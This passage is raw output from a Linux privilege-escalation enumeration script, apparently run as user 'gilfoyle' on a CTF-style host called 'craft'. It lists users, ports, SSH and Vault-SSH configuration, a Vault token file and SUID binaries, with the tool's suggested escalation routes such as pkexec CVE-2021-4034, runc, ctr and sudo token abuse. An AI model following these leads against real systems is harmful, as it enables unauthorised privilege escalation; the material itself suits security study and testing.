TX packets 30 bytes 2862 (2.7 KiB)
 TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

veth5687e2b: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500

inet6 fe80::e0cf:5bff:fe05:5856 prefixlen 64 scopeid 0x20<link>
ether [Link] txqueuelen 0 (Ethernet)
RX packets 392203 bytes 44953860 (42.8 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 417608 bytes 60199950 (57.4 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

veth7e96868: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500

inet6 fe80::ec27:72ff:fe11:ba41 prefixlen 64 scopeid 0x20<link>
ether [Link] txqueuelen 0 (Ethernet)
RX packets 1079 bytes 69066 (67.4 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 402 bytes 40037 (39.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

veth7e1df0c: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500

inet6 fe80::38c4:c1ff:fe7d:365 prefixlen 64 scopeid 0x20<link>
ether [Link] txqueuelen 0 (Ethernet)
RX packets 194 bytes 40018 (39.0 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1027 bytes 61192 (59.7 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

vethaf27d62: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500

inet6 fe80::5444:4eff:fe20:6f4c prefixlen 64 scopeid 0x20<link>
ether [Link] txqueuelen 0 (Ethernet)
RX packets 1947 bytes 937460 (915.4 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2402 bytes 1305250 (1.2 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

vethdc12f9f: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500

inet6 fe80::a07f:f8ff:fef4:9d78 prefixlen 64 scopeid 0x20<link>
ether [Link] txqueuelen 0 (Ethernet)
RX packets 672870 bytes 116529990 (111.1 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 695704 bytes 137466647 (131.0 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

vethe4fc99f: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500

inet6 fe80::8c19:7cff:fede:598f prefixlen 64 scopeid 0x20<link>
ether [Link] txqueuelen 0 (Ethernet)
RX packets 1444 bytes 1238229 (1.1 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2613 bytes 314177 (306.8 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

╔══════════╣ Hostname, hosts and DNS

══╣ Hostname Information
System hostname: [Link]
FQDN: craft

══╣ Hosts File Information

Contents of /etc/hosts:
[Link] localhost
 [Link] craft [Link] [Link] [Link]
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
[Link] [Link]

══╣ DNS Configuration

DNS Servers ([Link]):
[Link]
[Link]
-e
Systemd-resolved configuration:
[Resolve]
-e
DNS Domain Information:
(none)
-e
DNS Cache Status (systemd-resolve):
DNS Servers: [Link]
[Link]
DNSSEC NTA: [Link]
[Link]
[Link]
[Link]

╔══════════╣ Active Ports

╚ [Link]
[Link]#open-ports
══╣ Active Ports (netstat)
tcp 0 0 [Link]:5355 [Link]:* LISTEN -
tcp 0 0 [Link]:22 [Link]:* LISTEN -
tcp6 0 0 :::443 :::* LISTEN -
tcp6 0 0 :::5355 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::6022 :::* LISTEN -

╔══════════╣ Network Traffic Analysis Capabilities

══╣ Available Sniffing Tools

No sniffing tools found

══╣ Network Interfaces Sniffing Capabilities

Interface eth0: Not sniffable
Interface br-6d19c883b122: Not sniffable
Interface docker0: Not sniffable
Interface br-2126e7722b3e: Not sniffable
Interface br-26e562541429: Not sniffable
Interface veth5687e2b@if7: Not sniffable
Interface veth7e1df0c@if9: Not sniffable
Interface vethe4fc99f@if11: Not sniffable
Interface vethaf27d62@if13: Not sniffable
Interface veth7e96868@if15: Not sniffable
Interface vethdc12f9f@if17: Not sniffable
No sniffable interfaces found

╔══════════╣ Firewall Rules Analysis

══╣ Iptables Rules

No permission to list iptables rules

══╣ Nftables Rules

nftables Not Found

══╣ Firewalld Rules

firewalld Not Found

══╣ UFW Rules

ufw Not Found

╔══════════╣ Inetd/Xinetd Services Analysis

══╣ Inetd Services

inetd Not Found

══╣ Xinetd Services

xinetd Not Found

══╣ Running Inetd/Xinetd Services

Active Services (from netstat):
-e
Active Services (from ss):
-e
Running Service Processes:

╔══════════╣ Internet Access?

Port 80 is not accessible
DNS is not accessible
Port 443 is not accessible
ICMP is not accessible
Port 443 is not accessible with curl

╔═══════════════════╗
═══════════════════════════════╣ Users Information ╠═══════════════════════════════
╚═══════════════════╝
╔══════════╣ My user
╚ [Link]
[Link]#users
uid=1001(gilfoyle) gid=1001(gilfoyle) groups=1001(gilfoyle)

╔══════════╣ PGP Keys and Related Files

╚ [Link]
[Link]#pgp-keys
GPG:
GPG is installed, listing keys:
-e
NetPGP:
netpgpkeys Not Found
-e
PGP Related Files:
Found: /home/gilfoyle/.gnupg
total 20
drwx------ 3 gilfoyle gilfoyle 4096 Nov 30 08:14 .
drwx------ 5 gilfoyle gilfoyle 4096 Nov 30 08:14 ..
drwx------ 2 gilfoyle gilfoyle 4096 Nov 30 08:14 private-keys-v1.d
-rw------- 1 gilfoyle gilfoyle 32 Nov 30 08:14 [Link]
-rw------- 1 gilfoyle gilfoyle 1200 Nov 30 08:14 [Link]

╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d

╚ [Link]
[Link]#sudo-and-suid

╔══════════╣ Checking sudo tokens

╚ [Link]
[Link]#reusing-sudo-tokens
ptrace protection is disabled (0), so sudo tokens could be abused

[Link] Not Found

╔══════════╣ Checking Pkexec and Polkit

╚ [Link]
groups-linux-pe/[Link]#pe---method-2

══╣ Polkit Binary

Pkexec binary found at: /usr/bin/pkexec
Pkexec binary has SUID bit set!
-rwsr-xr-x 1 root root 23360 Jan 13 2022 /usr/bin/pkexec
pkexec version 0.105

══╣ Polkit Policies

Checking /etc/polkit-1/[Link].d/:

[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo
Checking /usr/share/polkit-1/rules.d/:
[Link](function(action, subject) {
if (([Link] == "[Link]-system" ||
[Link] == "[Link]-offline-update") &&
[Link] == true && [Link] == true &&
[Link]("sudo")) {
return [Link];
}
});

══╣ Polkit Authentication Agent

╔══════════╣ Superusers and UID 0 Users

╚ [Link]
groups-linux-pe/[Link]

══╣ Users with UID 0 in /etc/passwd

root:x:0:0:root:/root:/bin/bash

══╣ Users with sudo privileges in sudoers

╔══════════╣ Users with console

gilfoyle:x:1001:1001::/home/gilfoyle:/bin/bash
root:x:0:0:root:/root:/bin/bash

╔══════════╣ All users & groups

uid=0(root) gid=0(root) groups=0(root)
uid=1001(gilfoyle) gid=1001(gilfoyle) groups=1001(gilfoyle)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(messagebus) gid=109(messagebus) groups=109(messagebus)
uid=106(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)

╔══════════╣ Currently Logged in Users

══╣ Basic user information

[Link] up 3:01, 1 user, load average: 0.73, 0.26, 0.09
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
gilfoyle pts/0 [Link] 08:06 45.00s 0.59s 0.00s /bin/sh
./[Link]

══╣ Active sessions

[Link] up 3:01, 1 user, load average: 0.73, 0.26, 0.09
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
gilfoyle pts/0 [Link] 08:06 45.00s 0.59s 0.00s w

══╣ Logged in users (utmp)

system boot 2025-11-30 05:13
run-level 5 2025-11-30 05:13
LOGIN tty1 2025-11-30 05:13 629 id=tty1
gilfoyle - pts/0 2025-11-30 08:06 . 20968 ([Link])

══╣ SSH sessions

ESTAB 0 7976 [Link]:22 [Link]:60846

══╣ Screen sessions

══╣ Tmux sessions

╔══════════╣ Last Logons and Login History

══╣ Last logins

gilfoyle pts/0 [Link] Sun Nov 30 08:06 still logged in

wtmp begins Sun Nov 30 [Link] 2025

══╣ Failed login attempts

══╣ Recent logins from [Link] (limit 20)

══╣ Last time logon each user

Username Port From Latest
root tty1 Thu Nov 16 [Link] -0500 2023
gilfoyle pts/0 [Link] Sun Nov 30 [Link] -0500 2025

╔══════════╣ Do not forget to test 'su' as any other user with shell: without
password and with their names as password (I don't do it in FAST mode...)

╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid
password (if you know it)!!

╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════
╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/ctr
/usr/bin/curl
/usr/bin/docker
/usr/bin/make
/usr/bin/perl
/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/python3
/usr/bin/runc
/usr/bin/wget

╔══════════╣ Installed Compilers

ii gcc-6 6.3.0-18+deb9u1 amd64
GNU C compiler
ii linux-compiler-gcc-6-x86 4.9.320-2 amd64
Compiler for Linux on x86 (meta-package)

╔══════════╣ Checking if containerd(ctr) is available

╚ [Link]
[Link]#containerd-ctr-privilege-escalation
ctr was found in /usr/bin/ctr, you may be able to escalate privileges with it
ctr: failed to dial "/run/containerd/[Link]": connection error: desc =
"transport: error while dialing: dial unix /run/containerd/[Link]:
connect: permission denied"

╔══════════╣ Searching docker files (limit 70)

╚ [Link]
security/[Link]#docker-breakout--privilege-escalation
lrwxrwxrwx 1 root root 33 Feb 2 2019
/etc/systemd/system/[Link]/[Link] ->
/lib/systemd/system/[Link]
-rw-r--r-- 1 root root 0 Feb 2 2019
/var/lib/systemd/deb-systemd-helper-enabled/[Link]/[Link]

╔══════════╣ Analyzing MariaDB Files (limit 70)

-rw-r--r-- 1 root root 869 Aug 10 2017 /etc/mysql/[Link]
[client-server]
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/[Link].d/

╔══════════╣ Analyzing Rsync Files (limit 70)

-rw-r--r-- 1 root root 1044 Dec 10 2017 /usr/share/doc/rsync/examples/[Link]
[ftp]
comment = public archive
path = /var/www/pub
use chroot = yes
lock file = /var/lock/rsyncd
read only = yes
list = yes
uid = nobody
gid = nogroup
strict modes = yes
ignore errors = no
ignore nonreadable = yes
transfer logging = no
timeout = 600
refuse options = checksum dry-run
dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz

╔══════════╣ Analyzing PAM Auth Files (limit 70)

drwxr-xr-x 2 root root 4096 Nov 16 2023 /etc/pam.d
-rw-r--r-- 1 root root 2388 Feb 9 2019 /etc/pam.d/sshd
auth requisite pam_exec.so quiet expose_authtok log=/var/log/[Link]
/usr/local/bin/vault-ssh-helper -config=/usr/local/etc/[Link]
auth optional pam_unix.so not_set_pass use_first_pass nodelay
account required pam_nologin.so
session [success=ok ignore=ignore module_unknown=ignore default=bad]
pam_selinux.so close
session required pam_loginuid.so
session optional pam_keyinit.so force revoke
session optional pam_motd.so motd=/run/[Link]
session optional pam_motd.so noupdate
session optional pam_mail.so standard noenv # [1]
session required pam_limits.so
session required pam_env.so # [1]
session required pam_env.so user_readenv=1 envfile=/etc/default/locale
session [success=ok ignore=ignore module_unknown=ignore default=bad]
pam_selinux.so open

╔══════════╣ Analyzing Ldap Files (limit 70)

The password hash is from the {SSHA} to 'structural'
drwxr-xr-x 2 root root 4096 Nov 16 2023 /etc/ldap

╔══════════╣ Analyzing Keyring Files (limit 70)

drwxr-xr-x 3 root root 4096 Nov 22 2018 /usr/lib/python2.7/dist-packages/keyrings
drwxr-xr-x 3 root root 4096 Nov 22 2018 /usr/lib/python3/dist-packages/keyrings
drwxr-xr-x 2 root root 4096 Nov 16 2023 /usr/share/keyrings
╔══════════╣ Analyzing Cache Vi Files (limit 70)

-rw------- 1 gilfoyle gilfoyle 2546 Feb 9 2019 /home/gilfoyle/.viminfo

╔══════════╣ Analyzing Postfix Files (limit 70)

-rw-r--r-- 1 root root 694 Apr 12 2016
/usr/share/bash-completion/completions/postfix

╔══════════╣ Analyzing Other Interesting Files (limit 70)

-rw-r--r-- 1 root root 3526 May 15 2017 /etc/skel/.bashrc
-rw-r--r-- 1 gilfoyle gilfoyle 634 Feb 9 2019 /home/gilfoyle/.bashrc

-rw-r--r-- 1 root root 675 May 15 2017 /etc/skel/.profile

-rw-r--r-- 1 gilfoyle gilfoyle 148 Feb 8 2019 /home/gilfoyle/.profile

╔══════════╣ Searching mysql credentials and exec

Unable to determine MySQL version.

╔══════════╣ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found

-rw-r--r-- 1 root root 2760 Feb 2 2019 /etc/apt/[Link]

-rw-r--r-- 1 root root 8748 Mar 13 2022 /etc/apt/[Link].d/debian-archive-
[Link]
-rw-r--r-- 1 root root 8757 Mar 13 2022 /etc/apt/[Link].d/debian-archive-
[Link]
-rw-r--r-- 1 root root 2469 Mar 13 2022 /etc/apt/[Link].d/debian-archive-
[Link]
-rw-r--r-- 1 root root 8176 Mar 13 2022 /etc/apt/[Link].d/debian-archive-
[Link]
-rw-r--r-- 1 root root 8185 Mar 13 2022 /etc/apt/[Link].d/debian-archive-
[Link]
-rw-r--r-- 1 root root 2344 Mar 13 2022 /etc/apt/[Link].d/debian-archive-
[Link]
-rw-r--r-- 1 root root 5138 May 25 2017 /etc/apt/[Link].d/debian-archive-
[Link]
-rw-r--r-- 1 root root 5147 May 25 2017 /etc/apt/[Link].d/debian-archive-
[Link]
-rw-r--r-- 1 root root 2775 May 25 2017 /etc/apt/[Link].d/debian-archive-
[Link]
-rw-r--r-- 1 root root 7483 May 25 2017 /etc/apt/[Link].d/debian-archive-
[Link]
-rw-r--r-- 1 root root 7492 May 25 2017 /etc/apt/[Link].d/debian-archive-
[Link]
-rw-r--r-- 1 root root 2275 May 25 2017 /etc/apt/[Link].d/debian-archive-
[Link]
-rw------- 1 gilfoyle gilfoyle 1200 Nov 30 08:14 /home/gilfoyle/.gnupg/[Link]
-rw-r--r-- 1 root root 3452 Oct 5 2018 /usr/share/gnupg/[Link]
-rw-r--r-- 1 root root 68989 Mar 13 2022 /usr/share/keyrings/debian-archive-
[Link]
-rw-r--r-- 1 root root 24169 Mar 13 2022 /usr/share/keyrings/debian-archive-
[Link]

drwx------ 3 gilfoyle gilfoyle 4096 Nov 30 08:14 /home/gilfoyle/.gnupg

╔══════════╣ Checking if runc is available

╚ [Link]
[Link]#runc--privilege-escalation
runc was found in /usr/bin/runc, you may be able to escalate privileges with it

╔══════════╣ Searching uncommon passwd files (splunk)

passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd

╔══════════╣ Searching ssl/ssh files

╔══════════╣ Analyzing SSH Files (limit 70)

-rw-r--r-- 1 gilfoyle gilfoyle 666 Jul 20 2020 /home/gilfoyle/.ssh/known_hosts

|1|56KGX38Y+YAxcr1orDxZVLj6Du8=|41holEkDh05E5S9bPSZ8WqzQkK8= ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJAzk0wAfmy1zhnnnQOEoqLN0OK0zF9
VwqqwIRkG58ARwaVlwSARRf3BS7Ywo2AfjZS9EWZycsXxy3/7MwEQS1U=
|1|JpMdVEf/ptF8HRTLIjDWjT82BKs=|RpECuO5egKd0iKFp9arv4JtHA1w= ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJAzk0wAfmy1zhnnnQOEoqLN0OK0zF9
VwqqwIRkG58ARwaVlwSARRf3BS7Ywo2AfjZS9EWZycsXxy3/7MwEQS1U=
|1|7QIQ90Hs/vPfyyiyef4C5ouE/x0=|pvkYlIvTw7jFdIShM/rxKI4jCBA= ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJAzk0wAfmy1zhnnnQOEoqLN0OK0zF9
VwqqwIRkG58ARwaVlwSARRf3BS7Ywo2AfjZS9EWZycsXxy3/7MwEQS1U=

-rw-r--r-- 1 gilfoyle gilfoyle 401 Feb 9 2019 /home/gilfoyle/.ssh/authorized_keys

ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAABAQDSkCF7NV2ZF6z8bm8RaFegvW2v58stknmJK9oS54ZdUzH2jgD0bYa
uVqZ5DiURFxIwOcbVK+jB39uqrSzU0aDPlyNnUuUZh1Xdd6rcTDE3VU16roO918VJCN+tIEf33pu2VtShZX
DrhGxpptcH/
tfSRgV86HoLpQ0sojfGyIn+4sCg2EEXYng2JYxD+C1o4jnBbpiedGuqeDSmpunWA82vwWX4xxlLNZ/
ZNgCQTlvPMgFbxCAdCTyHzyE7KI+0Zj7qFUeRhEgUN7RMmb3JKEnaqptW4tqNYmVwpmMxHTQYXn5RN49YJQ
laFOZtkEndaSeLz2dEA96EpS5OJl0jzUTh gilfoyle@[Link]

-rw-r--r-- 1 root root 173 Nov 22 2018 /etc/ssh/ssh_host_ecdsa_key.pub

-rw-r--r-- 1 root root 93 Nov 22 2018 /etc/ssh/ssh_host_ed25519_key.pub
-rw-r--r-- 1 root root 393 Nov 22 2018 /etc/ssh/ssh_host_rsa_key.pub

PermitRootLogin yes
PasswordAuthentication no
PermitEmptyPasswords no
ChallengeResponseAuthentication yes
UsePAM yes
══╣ Some certificates were found (out limited):
/etc/ssl/certs/[Link]
/etc/ssl/certs/AC_RAIZ_FNMT-[Link]
/etc/ssl/certs/Actalis_Authentication_Root_CA.pem
/etc/ssl/certs/AffirmTrust_Commercial.pem
/etc/ssl/certs/AffirmTrust_Networking.pem
/etc/ssl/certs/AffirmTrust_Premium_ECC.pem
/etc/ssl/certs/AffirmTrust_Premium.pem
/etc/ssl/certs/Amazon_Root_CA_1.pem
/etc/ssl/certs/Amazon_Root_CA_2.pem
/etc/ssl/certs/Amazon_Root_CA_3.pem
/etc/ssl/certs/Amazon_Root_CA_4.pem
/etc/ssl/certs/Atos_TrustedRoot_2011.pem
/etc/ssl/certs/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068.pem
/etc/ssl/certs/Baltimore_CyberTrust_Root.pem
/etc/ssl/certs/Buypass_Class_2_Root_CA.pem
/etc/ssl/certs/Buypass_Class_3_Root_CA.pem
/etc/ssl/certs/[Link]
/etc/ssl/certs/CA_Disig_Root_R2.pem
/etc/ssl/certs/[Link]
/etc/ssl/certs/Certigna_Root_CA.pem
17455PSTORAGE_CERTSBIN

══╣ Some home ssh config file was found

/usr/share/openssh/sshd_config
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server

══╣ /etc/[Link] file found, trying to read the rules:

/etc/[Link]

Searching inside /etc/ssh/ssh_config for interesting info

Host *
SendEnv LANG LC_*
HashKnownHosts yes
GSSAPIAuthentication yes

╔══════════╣ Searching Vault-ssh files

/usr/local/etc/[Link]
vault_addr = "[Link]
ssh_mount_point = "ssh"
tls_skip_verify = true
allowed_roles = "*"

Path Type Accessor Description

---- ---- -------- -----------
cubbyhole/ cubbyhole cubbyhole_ffc9a6e5 per-token private secret storage
identity/ identity identity_56533c34 identity store
secret/ kv kv_2d9b0109 key/value secret storage
ssh/ ssh ssh_3bbd5276 n/a
sys/ system system_477ec595 system endpoints used for control,
policy and debugging
/home/gilfoyle/.vault-token

╔════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════
╚════════════════════════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ [Link]
[Link]#sudo-and-suid
-rwsr-xr-x 1 root root 31K Aug 21 2018 /bin/fusermount
ICMP is not accessible
-rwsr-xr-x 1 root root 60K Nov 10 2016 /bin/ping
-rwsr-xr-x 1 root root 44K Mar 7 2018 /bin/mount --->
Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 40K Mar 17 2021 /bin/su
-rwsr-xr-x 1 root root 31K Mar 7 2018 /bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 40K Mar 17 2021 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 75K Mar 17 2021 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 40K Mar 17 2021 /usr/bin/chsh
-rwsr-xr-x 1 root root 23K Jan 13 2022 /usr/bin/pkexec --->
Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)/Generic_CVE-2021-4034
-rwsr-xr-x 1 root root 49K Mar 17 2021 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 59K Mar 17 2021 /usr/bin/passwd ---> Apple_Mac_OSX(03-
2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 15K Jan 13 2022 /usr/lib/policykit-1/polkit-agent-helper-1
-r-sr-xr-x 1 root root 9.4K Nov 5 2020 /usr/lib/vmware-tools/bin32/vmware-user-
suid-wrapper
-r-sr-xr-x 1 root root 14K Nov 5 2020 /usr/lib/vmware-tools/bin64/vmware-user-
suid-wrapper
-rwsr-xr-- 1 root messagebus 42K Jun 9 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-
helper
-rwsr-xr-x 1 root root 431K Mar 1 2019 /usr/lib/openssh/ssh-keysign

╔══════════╣ SGID
╚ [Link]
[Link]#sudo-and-suid
-rwxr-sr-x 1 root shadow 35K May 27 2017 /sbin/unix_chkpwd
-rwxr-sr-x 1 root mail 19K Jan 17 2017 /usr/bin/dotlockfile
-rwxr-sr-x 1 root tty 15K Apr 12 2017 /usr/bin/bsd-write
-rwxr-sr-x 1 root shadow 23K Mar 17 2021 /usr/bin/expiry
-rwxr-sr-x 1 root shadow 71K Mar 17 2021 /usr/bin/chage
-rwxr-sr-x 1 root tty 27K Mar 7 2018 /usr/bin/wall
-rwxr-sr-x 1 root ssh 351K Mar 1 2019 /usr/bin/ssh-agent
-rwxr-sr-x 1 root crontab 40K Oct 29 2021 /usr/bin/crontab

╔══════════╣ Files with ACLs (limited to 50)

╚ [Link]
[Link]#acls
files with acls in searched folders Not Found

╔══════════╣ Capabilities
╚ [Link]
[Link]#capabilities
══╣ Current shell capabilities
./[Link]: 7794: ./[Link]: [[: not found
CapInh: [Invalid capability format]
./[Link]: 7794: ./[Link]: [[: not found
CapPrm: [Invalid capability format]
./[Link]: 7785: ./[Link]: [[: not found
CapEff: [Invalid capability format]
./[Link]: 7794: ./[Link]: [[: not found
CapBnd: [Invalid capability format]
./[Link]: 7794: ./[Link]: [[: not found
CapAmb: [Invalid capability format]
╚ Parent process capabilities
./[Link]: 7819: ./[Link]: [[: not found
CapInh: [Invalid capability format]
./[Link]: 7819: ./[Link]: [[: not found
CapPrm: [Invalid capability format]
./[Link]: 7810: ./[Link]: [[: not found
CapEff: [Invalid capability format]
./[Link]: 7819: ./[Link]: [[: not found
CapBnd: [Invalid capability format]
./[Link]: 7819: ./[Link]: [[: not found
CapAmb: [Invalid capability format]

Files with capabilities (limited to 50):

/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper =
cap_net_bind_service,cap_net_admin+ep

╔══════════╣ Users with capabilities

╚ [Link]
[Link]#capabilities

╔══════════╣ Checking misconfigurations of [Link]

╚ [Link]
[Link]#ldso
/etc/[Link]
Content of /etc/[Link]:
include /etc/[Link].d/*.conf

/etc/[Link].d
/etc/[Link].d/fakeroot-x86_64-[Link]
- /usr/lib/x86_64-linux-gnu/libfakeroot
/etc/[Link].d/[Link]
- /usr/local/lib
/etc/[Link].d/x86_64-[Link]
- /lib/x86_64-linux-gnu
- /usr/lib/x86_64-linux-gnu

/etc/[Link]
╔══════════╣ Files (scripts) in /etc/profile.d/
╚ [Link]
[Link]#profiles-files
total 12
drwxr-xr-x 2 root root 4096 Nov 22 2018 .
drwxr-xr-x 80 root root 4096 Nov 30 08:15 ..
-rw-r--r-- 1 root root 663 Apr 12 2016 bash_completion.sh

╔══════════╣ Permissions in init, init.d, systemd, and rc.d

╚ [Link]
[Link]#init-initd-systemd-and-rcd

═╣ Hashes inside passwd file? ........... No

═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No
╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/root/

╔══════════╣ Searching folders owned by me containing others files on it (limit

100)

╔══════════╣ Readable files belonging to root and readable by me but not world
readable

╔══════════╣ Interesting writable files owned by me or writable by everyone (not in

Home) (max 200)
╚ [Link]
[Link]#writable-files
/dev/mqueue
/dev/shm
/home/gilfoyle
/run/lock
/run/user/1001
/run/user/1001/gnupg
/run/user/1001/systemd
/run/user/1001/systemd/transient
/tmp
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/.Test-unix
/tmp/.X11-unix
/tmp/.XIM-unix
/var/tmp

╔══════════╣ Interesting GROUP writable files (not in Home) (max 200)

╚ [Link]
[Link]#writable-files

╔═════════════════════════╗
════════════════════════════╣ Other Interesting Files ╠════════════════════════════
╚═════════════════════════╝
╔══════════╣ .sh files in path
╚ [Link]
[Link]#scriptbinaries-in-path
/usr/bin/[Link]

╔══════════╣ Executable files potentially added by user (limit 70)

2020-11-05+[Link].1422452910 /etc/vmware-tools/[Link]-old
2020-11-05+[Link].0462454800 /usr/lib/vmware-tools/plugins32/vmsvc/[Link]
2020-11-05+[Link].0462454800
/usr/lib/vmware-tools/plugins32/vmsvc/[Link]
2020-11-05+[Link].0422454880
/usr/lib/vmware-tools/plugins32/vmusr/[Link]
2020-11-05+[Link].0422454880 /usr/lib/vmware-tools/plugins32/vmusr/[Link]
2020-11-05+[Link].0422454880
/usr/lib/vmware-tools/plugins32/vmusr/[Link]
2020-11-05+[Link].0422454880 /usr/lib/vmware-tools/plugins32/vmsvc/[Link]
2020-11-05+[Link].0422454880 /usr/lib/vmware-tools/plugins32/vmsvc/[Link]
2020-11-05+[Link].0422454880
/usr/lib/vmware-tools/plugins32/vmsvc/[Link]
2020-11-05+[Link].0422454880
/usr/lib/vmware-tools/plugins32/vmsvc/[Link]
2020-11-05+[Link].0422454880 /usr/lib/vmware-tools/plugins32/common/[Link]
2020-11-05+[Link].0422454880
/usr/lib/vmware-tools/plugins32/common/[Link]
2020-11-05+[Link].0382454970
/usr/lib/vmware-tools/configurator/XOrg/7.6_64/vmmouse_detect
2020-11-05+[Link].0342455040
/usr/lib/vmware-tools/configurator/XOrg/7.6/vmmouse_detect
2020-11-05+[Link].0182455360 /usr/lib/vmware-tools/sbin64/vmware-rpctool
2020-11-05+[Link].0182455360 /usr/lib/vmware-tools/sbin64/vmware-hgfsmounter
2020-11-05+[Link].0182455360 /usr/lib/vmware-tools/sbin64/vmware-checkvm
2020-11-05+[Link].0182455360 /usr/lib/vmware-tools/plugins64/vmusr/[Link]
2020-11-05+[Link].0182455360 /usr/lib/vmware-tools/plugins64/vmsvc/[Link]
2020-11-05+[Link].0182455360 /usr/lib/vmware-tools/plugins64/vmsvc/[Link]
2020-11-05+[Link].0182455360 /usr/lib/vmware-tools/plugins64/vmsvc/[Link]
2020-11-05+[Link].0182455360
/usr/lib/vmware-tools/plugins64/vmsvc/[Link]
2020-11-05+[Link].0182455360
/usr/lib/vmware-tools/plugins64/vmsvc/[Link]
2020-11-05+[Link].0182455360
/usr/lib/vmware-tools/plugins64/vmsvc/[Link]
2020-11-05+[Link].0182455360 /usr/lib/vmware-tools/plugins64/common/[Link]
2020-11-05+[Link].0182455360
/usr/lib/vmware-tools/plugins64/common/[Link]
2020-11-05+[Link].0142455450
/usr/lib/vmware-tools/plugins64/vmusr/[Link]
2020-11-05+[Link].0142455450
